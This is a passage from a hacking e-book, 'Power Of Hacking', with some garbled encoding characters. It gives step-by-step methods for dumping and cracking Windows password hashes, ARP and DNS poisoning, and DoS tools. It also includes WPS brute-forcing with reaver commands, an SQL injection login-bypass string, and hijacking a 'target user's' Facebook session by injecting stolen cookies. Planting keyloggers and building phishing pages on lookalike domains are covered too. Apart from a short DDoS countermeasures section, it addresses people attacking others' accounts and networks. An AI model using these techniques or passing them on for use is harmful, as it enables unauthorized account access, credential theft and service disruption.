Power Of Hacking accounts details stored in the SAM file from the target system which is known as dumping. The dumped details are transferred to the hackerâ&#x20AC;&#x2122;s computer and the password is cracked using an offline password cracking tool. The following are the two ways to dump password hashes: Dumping Hashes With Administrator Access If you have administrator access to the system on which you want to dump password hashes, you can use a handy tool called PWDUMP. This is an open-source command-line tool to quickly dump password hashes onto a text file. The tool can be downloaded from the link below: PWDUMP: http://www.tarasco.org/security/pwdump_7/ This is a very small tool which is less than a MB in size and can be carried to the target location in a USB thumb drive. To dump the hashes, just open the command prompt with administrator rights, navigate to the location of the tool (PwDump7.exe) and run the following command: PwDump7.exe >> targetfilename.txt As shown in the below snapshot, I am running the PwDump.exe from my USB thumb drive (M:) and dumping the hash details in a file called hash.txt. This file should get created in the same directory from which PwDump.exe is running.
The hash.txt file contains a list of existing user accounts on the machine and their corresponding NTLM hashes as shown below:
Dumping Hashes Without Administrator Access Mail:mtahirzahid@yahoo.com
Page 36
Power Of Hacking The previous section shows how to dump password hashes when you already have administrator access to the target machine. What if you do not have administrator access? In this case, you can use your Kali Linux Live DVD to boot up the system and load the Linux. From here, access the drive on which the Windows OS is installed and navigate to \windows\system32\config\. From here copy the two files SAM and SYSTEM on to your USB device so that you can carry them to your computer for offline password cracking.
CRACKING THE WINDOWS PASSWORD After successfully dumping the password hashes, we can now easily crack them using different tools and approaches as mentioned below: Using Rainbow Tables As discussed in the previous chapter, a rainbow table contains a list of pre-computed hashes that can be instantly compared against the dumped password hash to crack the password. This is so far the best and the fasted method to successfully crack the Windows password. For this we will use an open-source tool called Ophcrack that can be downloaded from the link below: Ophcrack Website : http://ophcrack.sourceforge.net/ From the above link, download the installable version of Ophcrack (not the Live CD version) and install it on your system. During the installation process, when the option comes up to download rainbow tables, uncheck them all and just install the program. It is
Mail:mtahirzahid@yahoo.com
Page 37
Power Of Hacking always better to download the rainbow tables separately.
Once you have it installed on your system, go to the Ophcrack website from the above link and click on Tables in the navigation menu. Here you should see a list of rainbow tables you can download. If you want to crack the passwords of Windows XP and prior operating systems download the tables from the LM hashes section. For operating systems after XP such as Windows Vista, 7 and 8 download the tables from the NT hashes section.
Mail:mtahirzahid@yahoo.com
Page 38
Power Of Hacking
As shown in the above snapshots, as the character set increases the size of the table grows bigger. Bigger the table higher the chance of successful cracking. You can download the one that best matches your needs. For the purpose of demonstration, I am using the “Vista proba free” table on my Windows 8 machine with Ophcrack. Here is a step-by-step guide on how to use this tool to crack passwords. 1. Open the Ophcrack tool by double-clicking the icon on the desktop. 2. From the main Ophcrack window, click on “Tables” button and select the table that you have downloaded from the list. Now click on “Install” button, load the folder that
Mail:mtahirzahid@yahoo.com
Page 39
Power Of Hacking contains the downloaded tables and click on “OK”.
3. Next, to load the dumped password hashes, click on “Load” button, select “PWDUMP file” option and load the hash.txt file obtained by running the PWDUMP tool on target machine. If you have SAM and SYSTEM files instead of hash.txt, you can choose the option Encrypted SAM instead of “PWDUMP file” and select the folder which contains those two files.
4. When everything is loaded and ready as shown in the above snapshot, click on “Crack” button and site back patiently. The cracking process will take from anywhere between few minutes to few hours to complete depending upon the size of the table and strength of the password. If it is successful, the cracked password will be
Mail:mtahirzahid@yahoo.com
Page 40
Power Of Hacking displayed along with the time taken to crack as shown below:
If you become unsuccessful in cracking the password, you may try a different rainbow table that covers more characters and long passwords. Using Brute-Force Approach Even though using rainbow tables is by far the fastest and the best approach to crack passwords, it may not be successful for long and strong passwords as hash tables for such passwords are hard to find. So, brute-force approach becomes inevitable under these situations. But remember it may take a very long time ranging from a few hours to few days to complete the cracking process. Since Ophcrack is not so effective for the bruteforce approach, we will use another powerful tool called L0phtCrack which is available from the link below: L0PhtCrack Download: http://www.l0phtcrack.com/download.html After installing L0phtCrack, Click on “Import hashes” button from the main window to load the hashes. You have the option to load the hashes from both the “PWDUMP file” as
Mail:mtahirzahid@yahoo.com
Page 41
Power Of Hacking
well as “SAM file”. Click on the “Session Options” button to further configure different auditing options such as dictionary and brute-force attacks. You can enable or disable specific attacks and also customize character set, password length and range options for brute-force approach. Configuring the auditing options wisely can avoid unnecessary time delay and thereby speed up the password cracking process. Once you are done with loading the hashes and configuring the options, click on the “Begin” button. This will initiate the cracking process and the time consumed to crack the password depends on various factors like the password strength (length + presence of alphanumeric + special characters), type of attack (dictionary, hybrid or brute-force) and the speed of your computer. If the password cracking process is successful you should see the cracked password next
Mail:mtahirzahid@yahoo.com
Page 42
Power Of Hacking to the user name in the L0phtCrack window as shown below:
Sniffing Password Hashes on a Network If your computer is on a network such as office or school, it is possible to remotely import the password hashes of other computers on the network without the need to gain physical access to them. This method is called sniffing and L0phtCrack 6 and above supports this option. To sniff password hashes from other computers, just click on the “Import From Sniffer” button on the main window. If more than one network interface is detected, the “Select Network Interface” dialog box allows you to choose the interface to sniff on. After choosing your interface, the “SMB Packet Capture Output” dialog box appears where you need to click on “Start Sniffing”. If the hashes are captured, they are immediately displayed in the dialog box after which you can hit “Stop Sniffing” and click on “Import” button to load the password hashes for cracking. TECHNIQUES FOR ACTIVE SNIFFING Since most computer networks today uses switches instead of hubs, active sniffing proves more feasible under practical conditions. The following are some of the important techniques used in active sniffing: Mail:mtahirzahid@yahoo.com
Page 43
Power Of Hacking ARP Poisoning Before actually going into ARP poisoning, let us first try to understand what ARP actually means. What is an ARP? ARP which stands for Address Resolution Protocol is responsible for converting IP address to a physical address called MAC address in a network. Each host on a network has a MAC address associated with it which is embedded in its hardware component such as NIC (Network Interface Controller). This MAC address is used to physically identify a host on the network and forward packets to it. When one host wants to send data to another, it broadcasts an ARP message to an IP address requesting for its corresponding physical address. The host with the IP address in the request replies with its physical address after which the data is forwarded to it. This ARP request is cached immediately and stored in an ARP table to ease further lookups. So, ARP poisoning (also known as ARP spoofing) is where the hacker goes and pollutes the entries in the ARP table to perform data interception between two machines in the network. For this, whenever a source host sends an ARP message requesting for the MAC address of target host, the hacker broadcasts the MAC address of his machine so that all the packets are routed to him and not the target host that is intended to receive. The
Mail:mtahirzahid@yahoo.com
Page 44
Power Of Hacking following figure shows an illustration of how ARP poisoning is performed.
As shown in the above example John, Adam and the attacker all three share the same network. John decides to send a message to Adam where his computer knows the IP address of Adam as 192.168.1.3 but does not know its MAC address. So it will broadcast an ARP message requesting for the MAC address of 192.168.1.3. But, the Attacker will poison the ARP cache table by spoofing Adam’s IP address and mapping his (attacker’s) MAC address on to. As a result, John’s traffic gets forwarded to the attacker’s computer where he sniffs all the vital information and forwards the same to Adam so as to make everything look normal. Tools for APR Poisoning The following are some of the tools that can be used to carry out ARP poisoning: 1. Ettercap This is an open-source network security tool used for performing sniffing and man-in-themiddle attacks on a local network. It is capable of intercepting network traffic and capturing vital information like passwords and emails. It works by putting the network interface device into promiscuous mode and poisoning ARP entries of the target machines to sniff traffic even on switched network environment. It can be downloaded from the link below: Download Ettercap: http://ettercap.github.io/ettercap/
Mail:mtahirzahid@yahoo.com
Page 45
Power Of Hacking 2. Nightawk This is a simple tool for performing ARP spoofing and password sniffing. It has the ability to capture passwords from web login forms implemented on protocols like HTTP, FTP, SMTP and POP. It can be downloaded from the link below: Download Nightawk: https://code.google.com/p/nighthawk/ MAC Flooding MAC flooding is another type of sniffing technique used in a switched network environment that basically involves flooding the switch with numerous unnecessary requests. Since switches have limited memory and processing capabilities to map MAC addresses to physical ports, they gets confused and hits their limitation. When switches hits their limitation they will fall into an open state and starts acting just like a hub. That means, all traffic gets forwarded to all ports just like in case of an unswitched network so that the attacker can easily sniff the required information. Tools for MAC Flooding EtherFlood is an easy to use open-source tool to carryout MAC flooding in a switched network environment. The download link EtherFlood is mentioned below: Download EtherFlood: http://ntsecurity.nu/toolbox/etherflood/ DNS CACHE POISONING:DNS cache poisoning (also known as DNS spoofing) is a technique similar to ARP poisoning where the Domain Name System (DNS) resolverâ&#x20AC;&#x2122;s cache is polluted by introducing manipulated data into it. So, whenever users try to access websites, the poisoned DNS server returns an incorrect IP address thereby directing the users to the attackerâ&#x20AC;&#x2122;s computers. The DNS is responsible for mapping the human readable domain names to their corresponding addresses. In order to improve the speed of resolution, DNS servers often cache the previously obtained query results. Before caching or forwarding the query results, the DNS server has to validate the response obtained from other servers to make
Mail:mtahirzahid@yahoo.com
Page 46
Power Of Hacking sure that it has come from an authoritative source. However, some servers are configured with less security features where they fail to properly validate the source of response. Hackers can exploit this vulnerability to introduce malicious records to the DNS cache so as to redirect a large group of Internet users to their computers. When a DNS cache is said to be poisoned, it will affect all those Internet users who have configured their systems to use it as their DNS server. The following figure illustrates the working of DNS cache poisoning attack.
As shown in the above figure, a user will place a request to the DNS server for resolving “facebook.com”. Since the DNS server does not have the IP in its cache, it forwards the same request to the next DNS server. Now, a rouge DNS server picks up the request and replies with a fake IP for the query “facebook.com”. Without actually validating the response, the DNS server forwards the result to the user and also stores the result in its cache. As a result the cache gets poisoned. The user is now directed towards the fake “Facebook” server maintained by the hacker instead of the real one. All the subsequent requests from other users for “facebook.com” is
Mail:mtahirzahid@yahoo.com
Page 47
Power Of Hacking also answered by the compromised DNS server using its poisoned cache data. In this way it is possible for the hacker to victimize a large group of people and hijack their personal information such as passwords, emails, bank logins and other valuable data. MAN-IN-THE-MIDDLE ATTACK Man-in-the-middle is referred to a kind of attack where the attacker intercepts an ongoing communication between two hosts in a network with an ability to sniff the data or manipulate the packets exchanged between two communicating parties. This attack is somewhat similar to the one shown in the figure 11.1 from the previous section. Another good example of man-in-the-middle attack is an active eavesdropping carried out by the attacker by making two independent connections with the victims to make them believe that they are chatting with each other. But the entire conversation is actually controlled by the attacker as illustrated in the following figure
SMAC SMAC is a handy tool that allows you to spoof the MAC address on your machine. Using this tool it is possible to set the MAC address of your choice so as to easily fool other machines on the network to send their information to your machine.
Mail:mtahirzahid@yahoo.com
Page 48
Power Of Hacking The following snapshot shows the SMAC tool in action:
The download link for SMAC is given below: SMAC Download : http://www.klcconsulting.net/smac/ DoS Attack Techniques The following are some of the common techniques employed in denial of service attack: 1. Smurf Attack (ICMP flood) In this type of DoS attack, the attacker broadcasts a large amount of Internet Control Message Protocol (ICMP) echo request packets to a computer network with a spoofed IP address of the target host (victim). This will flood the target host with lots of ping replies (ICMP echo replies) from the network which makes it impossible to handle. There is also a variant of smurf attack called fraggle attack where UDP packets are used instead of
Mail:mtahirzahid@yahoo.com
Page 49
Power Of Hacking ICMP packets. The following figure illustrates the mechanism of a smurf attack:
2. Ping of Death (POD) In this kind of attack, the attacker deliberately sends an IP packet larger than the allowed size of 65,535 bytes. Since the size exceeds the maximum allowed limit, it is split across multiple IP packets known as fragments and sent to the target host. However, when the target tries to reassemble the packet on its end, the fragments add up to more than the allowed size of 65,535 bytes. Being unable to handle oversized packets, the operating system will freeze, reboot or simply crash thereby causing all the services running on it to become unavailable to the legitimate users. In this way, the attacker becomes successful in causing a denial of service using the ping of death technique. 3. Teardrop Attack Teardrop attack involves sending IP fragments with oversized payload and overlapping offset value especially in the second or later fragment. If the receiving operating system is unable to aggregate the packets accordingly, it can lead to system crash. 4. SYN Flood Attack The SYN flood attack exploits a known weakness in the TCP connection sequence called the â&#x20AC;&#x153;three-way handshakeâ&#x20AC;?. According to this, a host sends SYN Request to the target server which responds with a SYN-ACK back to the host. Finally the requesting host Mail:mtahirzahid@yahoo.com
Page 50
Power Of Hacking sends an ACK Response back to the server which completes the three-way handshake process to establish the connection. However, in case of a SYN attack, a large number bogus TCP SYN requests are sent to the target server but the SYN-ACK response sent back from the server is not answered. Sometimes the attacker may even use a spoofed IP address while sending a SYN request. For each SYN request from the attacker, the victim server allocates resources and keeps waiting for the ACK from the requesting source (attacker). Since no ACK is received, the server gets flooded with a large amount of half-open connections thereby leading to
Tools for DoS Attacks Now, let us look at some of the popular tools used for DoS attacks. 1. Slowloris Slowloris is a tool built for Linux platform that targets hosts running web servers such as Apache, dhttpd, Tomcat and GoAhead. This tool works by sending too many HTTP headers to the target server but never completes it. Slowloris is designed to take down a target web server from a single machine by holding as many connections to it as possible. This will eventually overflow the maximum connections that the target web server can handle thereby leading to a denial of service for other legitimate connections. 2. QSlowloris This tool works on the same principle as that of Slowloris but has a graphical user interface for ease of use and works on Windows platform. Mail:mtahirzahid@yahoo.com
Page 51
Power Of Hacking 3. PyLoris PyLoris is basically a testing tool for servers but can also be used to perform DoS attacks. It can target various protocols including HTTP, FTP, SMTP, IMAP and Telnet. 4. LOIC (Low Orbit Ion Cannon) LOIC is an open-source network stress testing and DoS tool. It floods the target server with a large amount of TCP or UDP packets resulting in a denial of service. DISTRIBUTED DENIAL OF SERVICE (DDOS) ATTACK A distributed denial of service attack happens when the attack on the target host originates from multiple compromised systems. Before launching the attack, the attacker compromises multiple systems from one or more networks using trojans and other techniques. These compromised systems are known as zombies where the attacker uses them to launch a DDoS attack on the final target. The advantages of distributed denial of service is that since multiple systems are used, the target can easily be flooded with too much traffic eventually causing it to go down. A more clear understanding can be obtained using the following figure which illustrates the mechanism involved in a typical DDoS attack.
Characteristics of DDoS Attack
Mail:mtahirzahid@yahoo.com
Page 52
Power Of Hacking When compared to a DoS attack, DDoS is a large scale coordinated attack on the target using large number of pre-compromised systems (zombies). DDoS attack works under two levels. The final target which is under direct attack is known as the “primary victim” while the zombies used to attack it are referred to as “secondary victims”. As the attack originates from multiple network locations and involves large number of zombies, it is often hard to detect or prevent. A simple DoS attack which originates from a single IP address can easily be blocked at the firewall level. But a DDoS attack which originates from twenty to thirty thousand different systems (IP addresses) is extremely hard to detect. Even if the company makes a guess work and manages to block multiple IP addresses at its firewall, there is a clear chance of real users being adversely affected as it is hard to differentiate between genuine and malicious traffic. DDoS Attack Mechanism Now let us look at some of the DDoS attack models that are commonly in place: Agent Handler Model Agent handler model is one of the popular DDoS mechanisms where the attacker cleverly designs the attack in a hierarchical manner so as to improve its effectiveness and also make it hard to detect and trace back. At the first level, the attacker compromises a set of computers and installs a handler program on them. At the second level, the attacker compromises another large set of computers commonly referred to as “agents” or “zombies” which are controlled by the
Mail:mtahirzahid@yahoo.com
Page 53
Power Of Hacking
“handlers”. attack, the attacker cleverly sits at the top of the hierarchy
So, during the time of
controlling the handlers which in turn initiate the agents (zombies) to attack the target host (victim). Since the attacker safely hides in the background, this type of attack makes it really hard to trace back to the source. IRC Based Model IRC based model is similar to the above discussed “agent handler model” but the only difference is that, the attacker makes use of an “Internet Relay Chat (IRC) network” instead of handlers to connect to the agents.
The advantage of this model is that the attacker can use legitimate IRC port to easily connect himself to agents and initiate the attack. Also, huge amount of traffic on IRC network makes it difficult for the network administrator to trace the presence of attacker on the server. Mail:mtahirzahid@yahoo.com
Page 54
Power Of Hacking Tools for DDoS Attacks The following are some of the popular tools used in performing DDoS attacks: 1. Trinoo Trinoo is a popular tool for DDoS attacks that has a record of taking down large sites like Yahoo! It is designed to cause coordinated DDoS attacks on the target from different locations. This tool basically uses the “remote buffer overrun” vulnerability of systems to get installed and later use them as zombies. 2. DDoSim DDoSim also known as Layer 7 DDoS simulator is an excellent tool to carry out DDoS attack on the target by simulating several zombies. These zombies create full TCP connection to the target using random IP addresses. It can also perform HTTP based DDoS attacks with both valid and invalid requests. 3. Tor’s Hammer This is another nice DDoS tool written in Python. It is a highly effective tool that has the capability to take down machines running Apache and IIS servers in a very short time. The advantage of this tool is that it has the ability to run through a TOR network ( anonymous network) to keep the whole attack unidentified. 4. Davoset Davoset is yet another impressive tool for performing DDoS attacks. It makes use of the “abuse of functionality” vulnerability on sites to use them as zombies and cause DDoS attacks on the target. COUNTERMEASURES After exploring a fair amount of information about different types DoS attacks, their mechanism and various tools used in performing them, let us now look at some of the countermeasures that one can take to stop or mitigate such attacks from happening on your systems. Using an IDS (Intrusion Detection System) and IPS (Intrusion prevention System)
Mail:mtahirzahid@yahoo.com
Page 55
Power Of Hacking can be of a great advantage when it comes to detection and prevention of DoS/DDoS attacks at an early stage. Blacklist IP addresses that are found to be the source of a possible DoS attack. Ingress Filtering: Make sure that the incoming packets are coming from a valid source. Egress Filtering: Scan all the outgoing packets for malicious data before they actually leave the network. Since it is possible to easily spoof the IP address of incoming DDoS packets, there is a good chance that the packets will not represent a valid source. So, configure the firewall to drop packets that do not represent a valid source address. Place a firewall or packet sniffer that filters out all incoming traffic that does not have an originating IP address. Increase the available bandwidth or resources to prevent the services from going down quickly during an attack. Load Balancing: Use a multiple server architecture and balance the incoming load on each server. This can help improve performance as well as mitigate the effects of DDoS attacks. WIRELESS NETWORK BASICS Before jumping into the actual hacking, let us go through some of the basic concepts of wireless networking. The wireless standard is commonly represented as 802.11 and is used to setup wireless local area networks (WLANs) in environments such as schools and offices. 802.11 standard has 3 leading protocols (or extensions) as follows: 1. 802.11a - It offers higher speed (up to 54-Mbps), more channels and less interferences. 2. 802.11b - This protocol is also popularly known as â&#x20AC;&#x153;Wi-Fiâ&#x20AC;?. This is the standard that was used in most of the Wi-Fi hotspots.
Mail:mtahirzahid@yahoo.com
Page 56
Power Of Hacking 3. 802.11g - This is similar to the 802.11b protocol but provides much faster transmission. Components of Wireless Network A wireless network comprises of the following 3 basic components:
1. Wi-Fi Radio Device: This can be any device that has a wireless card (NIC) built into it such as a laptop, tablet, Wi-Fi enabled PC or a cell phone. 2. Access Point: This is the device which allows Wi-Fi radio devices to connect to the wireless network using Wi-Fi- standards. The AP then has a wired connection to the router. However, most modern routers now come with built-in APs to eliminate the need for an extra device. 3. Gateway: Routers are connected to the gateways which then connects the whole network to the Internet. Detecting Wireless Networks (War-Driving) To detect a wireless network such as a Wi-Fi Access Point, you can start roaming in a technology park, downtown area or simply through the walls of your own building using your Wi-Fi capable device (such as laptops and palm devices) with a â&#x20AC;&#x153;war-drivingâ&#x20AC;? software. Some of the popular war-driving software programs are listed below: Netstumbler: This is a Windows based war-driving tool that can detect wireless networks and also mark their position with a GPS. MiniStumbler: This is a portable version of NetStumbler that can be installed on
Mail:mtahirzahid@yahoo.com
Page 57
Power Of Hacking handheld computers. Vistumbler: This is another handy war-driving tool for Windows based operating systems. Kismet: This is a Linux based wireless sniffing tool that also has the ability to perform war-driving. Wifi Scanner: This is a GUI based Windows tool to detect all the available APs in your surroundings. Please note that all wireless network cards (NICs) are not same and some may not be compatible with the above mentioned war-driving tools. In that case you will have to use the software that came with your wireless NIC for detecting access points. Tools for Wireless Sniffing Let us look at some of the widely used tools for performing wireless sniffing: Wireshark Wireshark is one of my favourite packet sniffing tool as it is easy to use and supports GUI. Even though it works on Windows, I am using Linux operating system in my wireless sniffing demonstration as promiscuous mode is not supported on Windows platform. I am using TP-LINK TL-WN722N for this demo as it is fully compatible with Kali Linux that I am running it on. If you have a different wireless card or need to purchase one, please make sure that it is compatible with the Linux kernel that you will be using it on. Since Kali Linux is packed with Wireshark and all other useful tools there is no need to install it separately. Follow the below instructions to perform a sample wireless sniffing: 1. Boot up your computer from your Live Kali Linux DVD. 2. Once the Linux is loaded, plug-in your USB wireless card. 3. Open the â&#x20AC;&#x153;Terminalâ&#x20AC;? window and type the following command:
Mail:mtahirzahid@yahoo.com
Page 58
Power Of Hacking
iwconfig If your wireless card is compatible, you should see your device listed as shown in the
4.
above snapshot as “wlan0”. 5. The next step is to put the card into the monitoring mode (promiscuous mode). For this, type the following command: airmon-ng start wlan0 On my computer, wireless card is listed as “wlan0”. So, I have entered “wlan0” in the command. If your computer has a different listing such as “wlan1” or “wlan2”, then you need to replace the same in the above command. 6. After you execute the command successfully, your computer will create a new virtual wireless card and enable “monitor mode” in it. In my case it is “mon0” as shown in the below snapshot.
7. Now it is time to use Wireshark to start capturing the packets. To start Wireshark, click on Applications -> Kali Linux -> Top 10 Security Tools -> wireshark as
Mail:mtahirzahid@yahoo.com
Page 59
Power Of Hacking shown below:
8. Now, from the Wireshark main window, select “mon0” from the Interface List, double-click on it and select option to capture packets in both “promiscuous mode” and “monitor mode”. Next click on OK.
9. Once you are done, click on the “Start” button to begin sniffing. This should capture packets from all the nearby available wireless networks. The following snapshot
Mail:mtahirzahid@yahoo.com
Page 60
Power Of Hacking shows a sample packet capture:
The following are some of the other wireless sniffing tools worth considering: Ethereal This is another Linux based sniffing tool that works both on wired and wireless networks. It comes as a built-in security testing tool in Kali Linux. OmniPeek Wireless OmniPeek is a commercial 802.11 sniffer tool packet with tons of useful features for network monitoring. It works on Windows platform. WIRED EQUIVALENT PRIVACY (WEP) WEP is a component of 802.11 WLAN networks designed to provide confidentiality of data in the wireless networks. Unlike wired networks where it is possible to limit physical access only to trusted users, the same is not possible in case of a wireless network. Therefore, in order to overcome this limitation a special type of encryption called WEP is used to prevent attackers from intercepting the wireless data. However, there is a clear weakness in the WEP security system that can be exploited. Once enough data packets are captured and given ample time, the attacker can easily crack the WEP key used for encryption so as to decrypt all information back to raw data. Cracking WEP Encryption
Mail:mtahirzahid@yahoo.com
Page 61
Power Of Hacking The following tools are used popularly for cracking WEP encryption key/password: Aircrack-NG This is a popular tool used on Linux to crack 802.11 WEP encryption keys. It is a command line tool that comes as a built-in feature in Kali Linux package and can easily be used by loading it from the live DVD. Since it takes a long list of commands and procedures to crack WEP passwords, I have decided to omit the demo of the cracking process from this book. But you can still Google for â&#x20AC;&#x153;how to crack WEP encryptionâ&#x20AC;? to find many step-by-step procedures that describe the actual cracking process. WEPCrack WEPCrack is another popular tool for cracking 802.11 secret keys. This is the first tool to give a public demonstration on how WEP encryption can be exploited. WI-FI PROTECTED ACCESS (WPA) WPA is another wireless security standard that was mainly developed to address the shortcomings of WEP. WPA uses a different encryption standard which is better than that of WEP and is designed as a software upgrade. However, a flaw in this security feature called Wi-Fi Protected Setup (WPS) allows WPA passwords to be cracked using brute-force approach. Most access points have WPS enabled by default and hence remain vulnerable. Cracking WPA Passwords Here is a step-by-step demonstration of cracking WPA password using the Reaver tool that comes with Kali Linux. 1. Boot your computer using the Kali Live DVD and also plug-in the USB wireless card. 2. Open the terminal window and type the command iwconfig to make sure that your
Mail:mtahirzahid@yahoo.com
Page 62
Power Of Hacking card is detected.
3. Once you see your card listed (wlan0) as shown above, type the following command to put your card into the “monitoring mode” and start using it. airmon-ng start wlan0 This should activate “monitoring mode” for your card. On my computer it is enabled on “mon0” as shown in the below snapshot.
4. Now type the following command to detect nearby WPS enabled access points. wash -i mon0 -C This should perform a scan and list all the nearby access points as shown below. Once access points are detected, press Ctrl+C to stop the scanning process.
5. As shown above, there is one listing which shows a vulnerable access point with an Mail:mtahirzahid@yahoo.com
Page 63
Power Of Hacking “ESSID” NETGEAR31. Now issue the following command to perform brute force attack on the target. reaver -i mon0 -b 2C:B0:5D:68:93:D6 -vv Please note that you will have to replace “2C:B0:5D:68:93:D6” with the BSSID of the target AP in your case. 6. The cracking process will take a few hours to complete and if everything goes well you should see the cracked PIN and passphrase in the results as shown in the below
snapshot: Other Tools for Cracking WPA The following are some of the other WPA cracking tools that you can try: coWPAtty: This is a Linux based tool which uses dictionary approach and precomputed hash files (similar to rainbow tables) to crack WPA passphrases. Hashcat: This is one of the fastest CPU-based password cracking tool which uses different approaches like dictionary, brute-force and hybrid types of attacks. It comes for both Windows and Linux operating systems. SQL Injection Example Let us assume that there exists a login page designed to allow users to access a restricted area of the website upon authenticating their credentials. When a genuine user enters his “username” and “password” in the login field, the web application executes an SQL query Mail:mtahirzahid@yahoo.com
Page 64
Power Of Hacking in the background on a database which contains a list of usernames and passwords. If the “username-password” pair is said to be matching the user is granted access; otherwise access is denied. Suppose when a genuine user enters his credentials as follows: Username: tom Password: pass2000 The SQL query used to perform this match would be something as follows: SELECT * FROM users WHERE username=‘tom’ and password=‘pass2000’ Here the above SQL query is trying to find a row in the database by matching the “username-password” pair using the logical and operator. The and operator returns TRUE only when both the operands (username & password) matches. Otherwise access will be denied. Imagine what would happen when a hacker discovers a SQL injection vulnerability on this login page. He would inject a specially crafted SQL command into the login field as follows: Username: tom Password: ‘ or ‘1’=‘1 The vulnerable web application simply passes the data in the password field without proper validation and hence it gets interpreted as an SQL command instead of a normal text data. Now, the SQL query used to perform this match would be something as follows: SELECT * FROM users WHERE username=‘tom’ and password=” or ‘1’=‘1’ Here the logical operator or holds TRUE even if only one of its operands matches. In this case ‘1’=‘1’ matches and hence the hacker is granted access to the restricted area for the website. This way, the SQL injection vulnerability helps hacker bypass the authentication system and gain unauthorized access to the system. TOOLS FOR VULNERABILITY SCANNING The following are some of the popular tools that can be used to find vulnerabilities in web
Mail:mtahirzahid@yahoo.com
Page 65
Power Of Hacking applications. Acunetix: This is an enterprise level web application vulnerability scanner and penetration testing tool available for Windows machines. W3af: This is an open source web application attack and audit tool for Linux, BSD, Mac and Windows machines. Vega: This tool is used to find and fix commonly found web application vulnerabilities like XSS, SQL injection and more. It is an open source tool written in Java and available for both Windows and Linux operating systems. Arachni: This is a powerful open source tool used by penetration testers and system administrators to evaluate the security of web applications. The tool is available for Linux and Mac platforms. X5S: X5S is a powerful tool designed to find cross-site scripting vulnerabilities in web applications. Session Hijacking (Cookie Hijacking) Since web pages have no memories, they have to use a means to identify and authenticate individual users accessing web pages. Especially when people are accessing restricted pages or secure area which require password authentication, the website needs a means to remember users individually after their successful logins. For example, when people log into their Facebook account (by entering password), they may access several different pages until they finally sign out. It would be impractical to ask users to re-enter password each time they access a different page. Session Cookies Therefore, in order to remember individual users, websites store a small file called session cookie on the client side (in the userâ&#x20AC;&#x2122;s browser) which contains unique authentication information about the userâ&#x20AC;&#x2122;s active session. These cookies help identify individual users throughout the website. When the user hits the log out button or closes the browser, the session is said to expire.
Mail:mtahirzahid@yahoo.com
Page 66
Power Of Hacking So, when a hacker manages to steal the cookies of an active session he may inject them to his browser to gain unauthorized to any online account such as emails, social media accounts and so on. This technique is known as session hijacking (also referred to as cookie hijacking or cookie stealing). Session Hijacking Demo Below is a demonstration of typical session hijacking performed on a sample Facebook account. Here the hacker may use different techniques such as cross-site scripting (XSS) or packet sniffing to steal the target user’s session cookies. Even though Facebook stores several cookies in the browser after successful login, there are only two important cookies that contains authentication data to decide an active session. The names of these two cookies are as follows: 1. c_user 2. xs In order to hijack an active session, one has to gain access to the contents of the above two cookies. Snapshots of the sample data contained in these two cookies are shown below:
Once you have access to the contents of the above two session cookies “c_user” and “xs” Mail:mtahirzahid@yahoo.com
Page 67
Power Of Hacking it is time to inject them to your browser and gain access to the target user’s Facebook account. A Firefox extension called “Advanced Cookie Manager” makes this job a lot simpler. It provides an option to add and edit cookies stored on Firefox. Here is a step-bystep instruction to inject cookie to Firefox browser: Install the add-on Advanced Cookie Manager to your Firefox browser and open it by clicking the icon present in the toolbar. Switch to the “Manage Cookies” tab and click on the “Add Cookies” button. To create the “c_user” cookie fill in all the details exactly as shown in the below snapshot expect for the “Value” field which has to be replaced by the content from the hijacked cookie. Once you are done click on “Add” button.
Again click on “Add Cookie” button to create the cookie “xs” in the same way. After filling the details as shown below click on “Add” button. Do not forget to replace the
Mail:mtahirzahid@yahoo.com
Page 68
Power Of Hacking “Value” field with the content from your hijacked “xs” cookie:
After you have finished creating these two cookies, close the “Advanced Cookie Manager” and load the Facebook page. You should automatically be logged into the target user’s account where you have the complete access. Once you are logged, you can access the account as long as the target user’s session is active. That means, you can access the account in parallel from your own computer until the user hits “Log Out” button on his/her computer. Email Hacking Email hacking is one of the prevailing hot topics in the field of ethical hacking. A hacker can gain access to a wide variety of private information about the target user if he manager to hack his/her email account. Some of the possible ways to hack email accounts are discussed below. Keylogging Using a spyware program such as keylogger is the easiest way to hack an email or any other online account password. All you need to do is just install the keylogger program on the computer where the target user is likely to access his/her email account from. These spyware programs are designed to operate in a total stealth mode and hence remains completely hidden from normal users. Once the keystrokes are recorded you can unlock Mail:mtahirzahid@yahoo.com
Page 69
Power Of Hacking the program using a hot key combination or password to view the logs. The logs contain all the keystrokes typed on the computer keyboard including the usernames and passwords. Modern keylogger programs like Realtime-Spy, SpyAgent and SniperSpy supports remote monitoring feature where you can view the logs even from a remote location. Some of them also have a feature to send logs through email and FTP. Even though keyloggers can make the hacking process a lot simpler, they have a few drawbacks. Most of these programs have to be installed manually on the target computer for which you need to have physical access to it. Also, there is a chance of anti-spyware programs detecting and deleting the keylogger installation on the computer. Phishing Phishing is another popular and highly effective technique used by attackers to hack email and other online accounts. Most Internet users would easily fall prey and become victims to this type of attack. However, to device a phishing attack, one has to have at least a basic knowledge of HTML and programming. Steps Involved in Phishing Attack: The hacker first creates a replica of the target login page such as Gmail, Yahoo! or any other online account. This page is designed to submit all login information (username and password) on the form fields to a local database instead of the actual website. Hacker would use a scripting language such as PHP and a database such as MySQL to accomplish this. Once the page is integrated to the script and database, the hacker uploads the whole setup to a hosting server so as to make the phishing page go online. The hacker chooses a matching domain (such as gamil.com, gmail-account.com, yahoo-mail.com etc.) for his phishing page so as to avoid any suspicion. Once the phishing page is live and working, the hacker drives people to this phishing page by spreading the phishing link via email, Internet Messenger and forums.
Mail:mtahirzahid@yahoo.com
Page 70
Power Of Hacking Since phishing pages look exactly the same as the real one, people enter their login details on these pages where they are stolen away and gets stored in the hackerâ&#x20AC;&#x2122;s database. Session Hijacking As discussed earlier, it is possible to gain access to an email account through session hijacking. By stealing the cookies of an active session and injecting them to oneâ&#x20AC;&#x2122;s own browser, it is possible to gain access to the target email account. However, if the target user closes his/her ongoing session by logging out, you will no longer be able to access the account. Also, unlike keylogging and phishing, this method does not grant you the password of the target account and hence you will not be able to re-access it at a later time. Unlocking Stored Passwords Most users prefer to store the password details of email and other online accounts in the browser to enable speedy access. Sometimes login details of offline email clients such as Outlook are also stored on the computer. This makes them vulnerable to hackers. Nirsoft provides a handful of free tools to recover such stored passwords on Windows. You can download the tools from the link provided below: Download: http://www.nirsoft.net/password_recovery_tools.html Other Ways to Hack Internet Users The following are some of the other hacking methods that are common in practice: JavaScript: Since most client-side applications are written in JavaScript, it also makes a wonderful tool for hackers to write malicious programs for exploiting browser vulnerabilities. Due to lack of security awareness among users, they can 